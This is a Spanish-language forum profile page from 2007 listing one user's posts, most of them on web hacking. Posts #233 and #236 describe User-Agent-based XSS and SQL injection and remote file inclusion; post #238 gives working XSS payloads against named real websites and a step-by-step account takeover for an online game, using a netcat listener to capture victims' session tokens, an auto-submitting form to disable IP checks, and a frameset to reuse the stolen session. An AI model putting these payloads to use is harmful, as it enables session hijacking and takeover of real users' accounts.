Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - yeikos

#231
Muy bueno, ya no tendré que abrir con el bloc de notas los archivos que resulten sospechosos...  ;D
#232
Nivel Web / Re: UserAgent XSS/SQL Injection
24 Abril 2007, 18:28 PM
Por $_SERVER['HTTP_REFERER'] ya vi un fallo en PHP-Nuke 6.5 pero... ¿Por IP? ¿Podrías explicar cómo?
#233
Nivel Web / UserAgent XSS/SQL Injection
24 Abril 2007, 12:06 PM
Estaba programando PHP y al abrir el navegador k-meleon y se me ocurrió una idea... ¿y si inyectamos código HTML en el UserAnget? o mejor aún... ¿y si hacemos SQL Injection?

XSS Injection

<?php
echo $HTTP_USER_AGENT
?>



SQL Inyection

<?php
echo "<a href='".$_SERVER['PHPSELF']."?act=1'>Registrarse</a> |
<a href='"
.$_SERVER['PHPSELF']."'>Listado</a><br><br>";

$act $_GET['act'];

if (
$act == 1) {
$IP=getenv("REMOTE_ADDR");
echo $HTTP_USER_AGENT;
mysql_query("Insert into browsers (UserAgent, IP) values ('$HTTP_USER_AGENT', '$IP'), $link");
} else {
echo "Listado";
$result=mysql_query("select * from browsers where UserAgent = '".$HTTP_USER_AGENT."'",$link);  
while($row mysql_fetch_array($result)) { 
echo "Tu UserAgent fue registrado con la siguiente IP: ".$row['IP']."<br>";
}
}

?>



Ejemplo práctico en http://id.ziew.info.

No se si ya se ha hablado de esto anteriormente, a mi se me ocurrió de repente, aunque supongo que a mucha gente también...

PD: Para evitar estas inyecciones usen htmlspecialchars.
#234
Programación Visual Basic / Re: Bouncer
23 Abril 2007, 15:00 PM
¿Conoceis algún código fuente de un Bouncer que no esté orientado para el IRC? Es decir, que te puedas conectar a él con tu navegador, actuando como proxy. He creado algo parecido pero es muy engorroso, y con 3 controles winsock, si alguien tiene una idea clara sobre como hacerlo, se lo agradecería mucho.

#235
Si no nos dices lo que envias no podremos ayudarte, y si no te compromete mucho podrias decirnos la dirección para facilitarnos el trabajo.
#236
Nivel Web / Re: Ayuda con un RFI
22 Abril 2007, 21:59 PM
Cita de: Zinc en 10 Abril 2007, 03:10 AM
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Cita de: Universal SAC en 22 Abril 2007, 20:37 PM
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.


Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...


<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>
";
?>


allow_url_include = On
#237
Foro Libre / Re: Cumpleaños
22 Abril 2007, 13:16 PM
20 de Enero :P
#238
Nivel Web / Cross Site Scripting (XSS)
22 Abril 2007, 04:20 AM
Cross Site Scripting (XSS)

Dado que la información aqui mostrada no muestra links directos a terceros, pero que se puede inferir el link, el que desee que se quite algun link aqui mostrado, hagalo saber..

El autor no se hace responsable de los malos usos que se le de a este documento...


<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="http:// s e x y o n o .com/grupos/" method="POST">
<input type="hidden" name="buscargrupo" value="
<script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>">
</form>



http://www. v o t a m i c u e r p o .com/usuario.php?funcion=bloqueados&usuario=
<SCRIPT>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83));</script>&
Submit=Bloquear



http://ogameXXX.de/game/redir.php?url=
"><script>alert(String.fromCharCode(88,83,83,32,66,89,32,89,69,73,75,48,83))</script>


He encontrado más XSS esta semana, y varias son de páginas de alto prestigio, tipo MSN Hotmail, MSN Live, etc. Pero prefiero no publicarlo para evitar malos usos... a cambio les he dejado esto.

Os depcepcionaré al deciros que el último XSS no os servirá para lo que estais pensando, pues los contenidos de la cookie de oGame caracen de valor administrativo.

Pero quizás os alegre saber que en la variable session se deposita todo el valor necesario para administrar cualquier cuenta, tan solo es necesario que la víctima utilice un skin alojado en nuestro servidor o preguntarle el valor de la session mediante IS. Al desconocer su valor, no le dará ninguna importancia a esta.

Una vez cambiado el skin, desde nuestra máquina ponemos el netcat a escuchar el puerto 80 (nc -vv -L -p 80) para capturar la session, cerramos la conexión y a continuación hacemos que la victima ingrese en este formulario para desactivarle el IP-CHECK y así poder acceder a la misma session con IPs diferentes.

<META HTTP-EQUIV="Refresh" CONTENT="1; URL=javascript:document.forms[0].submit()">
<form action="options.php?session=SESSION&mode=change" method="POST" >
<input type="hidden" name="dpath" value="http://127.0.0.1/skin/">
<input type="checkbox" name="design" checked>
<input type="checkbox" name="noipcheck" checked>
</form>


Deberá identificarse de nuevo, así que volveremos a capturar la session, y una vez capturada ya podremos acceder a la cuenta...

<frameset framespacing="0" border="0" cols="190,*" frameborder="0">
<frame name="Inhalt" target="Hauptframe" src="http:/ogameXXX/game/leftmenu.php?session=SESSION"
noresize marginwidth="0" marginheight="0">
<frame name="Hauptframe" src="http://ogameXXX.de/game/overview.php?session=SESSION" target="_blank">
<noframes></noframes></frameset>


Quien quiera compartir información de cualquier tipo o tenga proyectos en mente, estaré encatado de conversar/devatir nuevas ideas, ¡Hasta entonces!  :P

PD: Por favor, eviten el uso del nombre de las páginas de las primeras dos inyecciones XSS para que google no las incluya en su buscador, gracias.
#239
Es díficil que encuentres un programa con estas características.

Si sabes programación no tendrás problemas, en caso contrario lo tienes difícil, aún así te dejo una estructura clara del programa.

Citar
Consulta al formulario para sacar los valores de 'x' e 'y'.
Brute forcing a la variable 'z', acompañado de los valores de 'x' e 'y'
Consulta al formulario para sacar los valores de 'x' e 'y'.
Brute forcing a la variable 'z', acompañado de los valores de 'x' e 'y'
...
#240
PHP / Re: Unir variables
21 Abril 2007, 04:08 AM
Gracias a todos por contestar  :P